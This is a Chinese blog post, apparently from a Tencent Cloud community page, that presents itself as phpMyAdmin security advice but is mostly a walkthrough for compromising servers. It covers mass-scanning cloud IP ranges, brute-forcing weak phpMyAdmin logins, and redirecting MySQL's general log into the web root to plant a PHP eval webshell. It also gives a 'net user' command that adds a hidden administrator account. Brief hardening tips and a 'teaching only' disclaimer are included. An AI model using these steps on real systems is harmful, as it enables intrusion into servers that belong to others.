phpmyadmin安全预防

头疼的安全

之前服务器总是本人黑,千疮百孔,只能一步步的去做一些安全防范,如何防范自然先从如何渗透开始.

文章及建议

前段时间看到了个phpmyadmin提权的教程,很多人都说现在那里还有root帐号root密码这种弱口令,今天给大家来一套完整的教学。

首先百度XX云X地区的IP段(你要是连几个国内云服务运营商的名字都不知道,那我就真的没办法了)。

找到以后百度随便找个工具扫描IP段,大的运营商一般直接后两个大段都是他的

然后找到IP段以后直接找一个80端口批量扫描的工具扫80端口,直接扫两个大段

我用的这个叫S-Xing,百度来的,不知道有没有后门,所以就不提供了

扫描好以后导入刚才扫描好的IP

然后选择自动后缀

线程根据自己配置来配置,我直接选择最高500,然后开始爆破

爆破结果

防范建议
这里的话,想要防范这一步,可以采取的方法有关闭phpMyAdmin,这个最直接了.
如果不关闭的话,建议更改访问的端口号.
然后默认密码必须修改,不可以使用简单密码.
目录的权限也最好下降到最低.

随便选择一个开搞

先看一下服务器信息xx.xx.xx.xx/l.php

网站路径什么的都爆出来了,登录后台

老规矩,查下mysql日志文件路径

先修改日志路径到当前网站路径,在开启日志,并插入一句话木马,然后关闭日志

SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/sean.php';

修改当前日志文件到网站目录下

set global general_log = "ON"; 开启mysql记录日志

select '<?php eval($_POST[sean]);?>'; 插入PHP 一句话木马

set global general_log = "OFF"; 关闭mysql记录日志

执行成功

接下来上菜刀连接上传好的一句话木马

net user admin$ sean2018.. /add & net localgroup administrators admin$ /add创建一个管理员账号

账号已存在,那就直接修改密码了,带$符号的都是被影藏账号,估计被日了多少次了吧

接下来连接试试

防范建议
在这一步的话,防范的方法也有一些,比方说加一个安全狗软件,算是不错的了.
至于写文件的这个权限,刚刚如果降低了,应该问题不大,不过也有可以提升权限的一些工具,因此需要及时更新数据库和系统的bug.
至于执行命令创建用户的权限,只能简单做好预防和定期查看了,基本上到了上一步,所有的权限和账户已经有了.到了这里目前只有重装系统,才能干掉这个入侵者的份了.
当然,如果把所有的漏洞堵上,也可以不重装.但是后门太多,非专业人员,处理不会怎么全面.

玩完,收工,文章内所有的工具,百度一搜索一大把,我也是百度来的,不知道有没有后门所以就不提供下载了,怕中毒找个虚拟机搞,自己折腾吧。

华盟网原创,随便转载但请注明来自77169.COM,感谢支持!

本文章只做教学思路,请勿用于非法用途

说明

欢迎评论,欢迎指正,转载也请注明出处.

参考文章

phpmyadmin从找目标到拿下服务器

版本说明

20180806 开始着手文章

20180807 文章完成时间

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏小文博客

Android平台渗透测试套件zANTI v2.5发布(含详细说明)

3562
来自专栏沈唁志

Kindle 怎么使用电子邮件附件推送电子书到设备中?

之前买过 PHP 的书看,结果也没看到了几本,一是书都在家里,没给公司带,二是下班晚回去不想看了

3203
来自专栏零基础使用Django2.0.1打造在线教育网站

零基础使用Django2.0.1打造在线教育网站(十七):我要学习配置

努力与运动兼备~~~有任何问题可以加我好友或者关注微信公众号,欢迎交流,我们一起进步!

1601
来自专栏kl的专栏

分布式链路追踪&应用监控APM软件-skywalking

当企业应用进入分布式微服务时代,应用服务依赖会越来越多,skywalking可以很好的解决服务调用链路追踪的问题,而且基于java探针技术,基本对应用零侵入零耦...

8037
来自专栏FreeBuf

Twitter不慎以纯文本形式泄漏用户密码

经过内部审计之后,Twitter近日承认,他们的密码存储机制存在错误,导致内部日志中记录了一些用户的密码。

942
来自专栏性能与架构

CC攻击的原理与防护

什么是CC攻击 CC攻击(Challenge Collapsar)是DDOS(分布式拒绝服务)的一种,是一种常见的网站攻击方法,攻击者通过代理服务器或者肉鸡向...

1.2K5
来自专栏云知识学习

IIS Windows 集成身份验证弹出输入用户名密码的解决办法

如果您正在设置您的IIS身份验证方式为“ Windows 集成身份验证 ”,并且您在使用IE访问您的站点时发现IE仍然要求您输入您的用户名和密码,而且您又不知道...

38013
来自专栏恰同学骚年

操作系统核心原理-3.进程原理(上):进程概要

进程管理、内存管理和文件管理是操作系统的三大核心功能,那么什么是进程呢?顾名思义,进程就是进展中的程序,或者说进程是执行中的程序。当一个程序被加载到内存之后就变...

1872
来自专栏FreeBuf

运维安全 | 等保视角下的SSH加固之旅

前段时间在搞等保,根据等保的安全要求,需要对公司的服务器进行安全加固,其中就涉及到对SSH Server的加固。正好最近有空,笔者将加固过程的一些经验,总结分享...

2623
来自专栏北京马哥教育

预防高逼格Linux黑客招数,不学你就后悔吧!

本文由马哥教育Linux云计算面授班24期学员推荐,转载自互联网,作者为And,内容略经小编改编和加工,观点跟作者无关,最后感谢作者的辛苦贡献与付出。 很多人都...

2997

扫码关注云+社区

领取腾讯云代金券